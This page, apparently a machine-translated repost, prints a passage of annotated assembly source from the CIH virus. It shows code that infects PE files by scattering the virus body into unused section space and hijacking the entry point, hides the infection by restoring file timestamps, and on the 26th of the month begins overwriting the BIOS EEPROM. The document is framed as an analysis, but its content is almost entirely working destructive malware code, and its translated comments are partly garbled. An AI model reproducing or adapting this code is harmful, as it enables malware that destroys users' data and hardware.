Virus program Source code example Anatomy-CIH virus [4]

Last Update:2017-01-17 Source: Internet

Author: User

Tags save file time and date

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

push EAX; block table size
push edx; edx is the offset of the Virus code block table
push esi; buffer address
　　
Combined virus code block and Virus code block table must be less than or equal to the amount of space not used
Inc ECX
push ecx; Save numberofsections+1
　　
SHL ecx, 03h; multiply 8
push ecx; reserved virus block table space
　　
Add ecx, eax
add ecx, edx; offset of the body of the ecx+ file
　　
Sub ecx, (sizeofheaders-@9) [esi]
Not ECX
Inc ECX; ecx for file header size-offset of BODY = unused space
　　
Push ECX
　　
Xchg ecx, eax; ecx to block table size
　　
mov eax, (Addressofentrypoint-@9][esi]; entry RVA address
add eax, (imagebase-@9) [esi]; Mount Base Address
MOV (ORIGINALADDRESSOFENTRYPOINT-@9) [esi], eax; Save the actual entry address after loading
　　
, unused space and virus the first block size comparison, if less than only set the infection flag
CMP word ptr [ESP], small codesizeofmergeviruscodesection
JL Onlysetinfectedmark
　　
; Read all virus block tables
mov eax, EBP; Read the function number
Call EDI; Read Block list to ESI (@9)
　　
The following completely modifies the error handling WinZip self-extracting file, when the user opens the self-extracting file,
, the virus will not infect. First, the virus obtains a torawdata pointer to the 2nd block table,
Read the block data to determine if it contains the word "WinZip (R)"
　　
Xchg eax, EBP
Push 00000004h
Pop ecx read 4 bytes
　　
Push edx
mov edx, (SIZEOFSCETIONTABLE+POINTERTORAWDATA-@9][EBX]
; edx is the offset of the second block (. rdata)
　　
Add edx, 12h, plus 10h+2h (10h for "WinZip ....")
　　
Call edi; Read 4 bytes to ESI
　　
To determine whether WinZip self-extracting files, if so, do not set the infection flag
CMP dword ptr [esi], ' pizn '
Je notsetinfectedmark
　　
Pop edx; edx points to block table in file first address
　　
; Set up a virus code block table
Pop ebx; unused space size
Pop edi; EDI = TOTALSIZEOFVIRUSCODESECTIONTABL
Pop ecx; ECX = numberofsections+1
　　
Push EDI
add edx, EBP; EBP to block table size
push edx; file pointer
　　
Add Ebp, ESI; Ebp points to the block table of the virus data area (first block)
Push EBP; Buffer address
　　
; Set the size of the first virus code block
Lea EAX, [ebp+edi-04h]
mov [EAX], ebx
　　
; Set the first block of viruses
Push ebx; The size of the first block of the virus code
　　
Add edx, EDI
push edx; file pointer
Lea EDI, (myvirusstart-@9) [esi]
Push EDI; buffer address
　　
Modify the entrance of the addressofentrypoint for the virus entrance
MOV (NEWADDRESSOFENTRYPOINT-@9) [esi], edx; Save a new program entry (virus text)
　　
; Set Initial data
Lea edx, [esi-sizeofscetiontable]; EdX first minus one block table length
mov ebp, offset virussize; ebp for virus length
　　
JMP starttowritecodetosections
　　
Write information to a virus block
Loopofwritecodetosections:
Add edx, sizeofscetiontable
mov ebx, (sizeofrawdata-@9) [edx]; EBX is the sizeofrawdata (block size) for the block table entry
Sub ebx, (Virtualsize-@9][edx]; minus virtualsize equals the block unused space
Jbe endofwritecodetosections
　　
Push ebx; Size
　　
Sub eax, 08h
mov [EAX], ebx; writing a virus block table
　　
mov ebx, (pointertorawdata-@9) [edx]; ebx Physical (actual) offset to block
Add ebx, (virtualsize-@9) [edx]; plus virtualsize
push ebx; ebx Pointer to the block's unused space
　　
Push EDI; Buffer Address
　　
mov ebx, (virtualsize-@9) [edx]
Add ebx, (virtualaddress-@9) [edx]
Add ebx, (imagebase-@9) [esi]; EBX the actual address after the block is loaded
mov [eax+4], ebx; saving to the virus block table
　　
mov ebx, [eax]; The block has no space size
Add (virtualsize-@9) [edx], ebx; add to VirtualSize of the block table entry
　　
Change the Block property of the block table entry to read and include initialization data
or (CHARACTERISTICS-@9) [edx], 40000040h
　　
; Start writing code
Starttowritecodetosections:
Sub EBP, ebx; virus size-Virus block size
　　
; Set the virus block table Terminator if it is less than (the virus is inserted)
Jbe Setviruscodesectiontableendmark
　　
Add EDI, EBX; point to the next piece of the virus
　　
; End of writing code
Endofwritecodetosections:
Loop loopofwritecodetosections
　　
Onlysetinfectedmark:
mov esp, DR1; Set infection flag only
　　
JMP Writeviruscodetofile; Jump to a program that writes viruses to infected files
　　
; Do not set the infection flag
Notsetinfectedmark:
Add ESP, 3ch
JMP closefile; go to CloseFile.
　　
; Set the virus block table and tags
Setviruscodesectiontableendmark:
; Adjust the virus block code
Add [eax], EBP; Correct the last item in the Virus block table
Add [esp+08h], EBP
　　
; Set block table End flag
XOR ebx, EBX
mov [eax-04h], ebx
　　
; VMM modifies the 20th interrupt when the virus program calls the VXD directive
Lea EAX, (lastvxdcalladdress-2-@9) [ESI]; The address of the previous call to the VXD directive
　　
MOV cl, vxdcalltablesize; number of VxD calls used
　　
Loopofrestorevxdcallid:
mov word ptr [eax], 20CDH; revert to "int 20h" form
　　
; Remove the ID number of the VXD call from the vxdcallidtable to the edx
mov edx, (vxdcallidtable+ (ecx-1) *04h-@9) [esi]
　　
mov [eax+2], edx; put in the back of "int 20h"
　　
; The difference between the address of the command with each call to VxD is placed in the vxdcalladdresstable
Movzx edx, byte ptr (vxdcalladdresstable+ecx-1-@9) [esi]
　　
Sub eax, edx; eax as Last Call address
　　
loop loopofrestorevxdcallid; restore other calls
　　
; Write the virus code to the file
Writeviruscodetofile:
mov eax, DR1;d R1 for the previously saved ESP
mov ebx, [eax+10h]; ebx save file handle for save in stack
mov edi, [eax]; EDI is the Ifsmgr_ring0_fileio call address saved in the stack
　　
; Loop Write
Loopofwriteviruscodetofile:
Pop ecx; The offset of each segment of the virus code
Jecxz Setfilemodificationmark; Until the virus is offset by 0.
　　
mov esi, ecx
mov eax, 0d601h; Write file function number (r0_writefile)
Pop edx; file pointer
Pop ecx; number of bytes to write
　　
Call EDI; VXD calls Ifsmgr_ring0_fileio, writes files
, write each piece of virus code, the virus block table, the new
; File block table, new program entry, infection flag
JMP Loopofwriteviruscodetofile
　　
; Modify the last modification time of the file so that the user does not know that the file has been modified
Setfilemodificationmark:
Pop ebx
Pop eax
　　
STC; setting a carry flag
PUSHF; sign-in stack
　　
; Close File
CloseFile:
xor eax, EAX
mov ah, 0d7h; Turn off the file function number
Call EDI; VXD call Ifsmgr_ring0_fileio Close file
　　
Popf
Pop esi
Jnc Iskillcomputer; If the carry flag is 0, turn to Killcomputer
　　
; Restore file modification time
mov ebx, EDI
　　
mov ax, 4303h
mov ecx, (filemodificationtime-@7) [esi]
mov edi, (filemodificationtime+2-@7) [esi]
Call ebx; VXD call Ifsmgr_ring0_fileio, modify the last modified time of the file
　　
　　
; Set not "Busy" flag
Disableonbusy:
Dec byte ptr (onbusy-@7) [esi]
　　
; Call the original Filesystemapihook
Prevhook:
Popad; restore all registers
　　
mov eax, dr0; Save the original file system hook program first address
JMP [eax]; jump to the original hook to execute
　　
Pifsfunc:
mov ebx, esp; EBX point to ESP to get the parameter address of the Filesystemapihookfunction
Push DWORD ptr [ebx+20h+04h+14h]; Pioreqpir parameters into the stack
call [ebx+20h+04h]; invoke Pifsfunc fsdfnaddr
Pop ecx
　　
mov [ebx+1ch], eax; Modify the value of EAX
　　
; After Pifsfunc is called, the data is obtained from the return value Pioreq
CMP DWORD ptr [ebx+20h+04h+04h], 00000024h
Jne Quitmyvirusfilesystemhook
　　
　　
To obtain the modified date and time of a file in DOS mode
mov eax, [ecx+28h]
MOV (FILEMODIFICATIONTIME-@6) [esi], eax; Save the obtained file time and date
　　
　　
; exit the virus program
Quitmyvirusfilesystemhook:
Popad; restore all registers
　　
ret; exit from file hook program for virus settings
　　
; Destroying the computer BIOS
Iskillcomputer:
To obtain the current date from the BIOS CMOS
mov al, 07h
Out 70h, AL
In Al, 71h
　　
Xor al, 26h; Judging if it's number 26th,
　　
If it is a debugger, turn to Disableonbusy
IF DEBUG
JMP Disableonbusy
ELSE
JNZ disableonbusy; If it is not number 26th, turn to disableonbusy without breaking
ENDIF
　　
; Start destroying BIOS EEPROM *
MOV bp, 0cf8h
Lea ESI, Ioforeeprom-@7[esi]
　　
: Displays the BIOS page of 000E0000-000EFFFF address segment, Total 64KB
mov edi, 8000384ch
MOV dx, 0cfeh
Cli
Call ESI
　　
: Displays the BIOS page of 000F0000-000FFFFF address segment, Total 64KB
mov di, 0058h
Dec edx; and A0FH
mov word ptr (booleancalculatecode-@10) [esi], 0f24h
Call ESI
　　
; Display ROM data for additional 000E0000-000E01FF segments in BIOS, total 512 bytes
; and writable BIOS block
Lea EBX, Enableeepromtowrite-@10[esi]
　　
mov eax, 0e5555h
mov ecx, 0e2aaah
Call EBX
mov byte ptr [eax], 60h

The above is the virus program source code example Analysis-CIH virus [4] content, more relevant content please pay attention to topic.alibabacloud.com (www.php.cn)!



This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More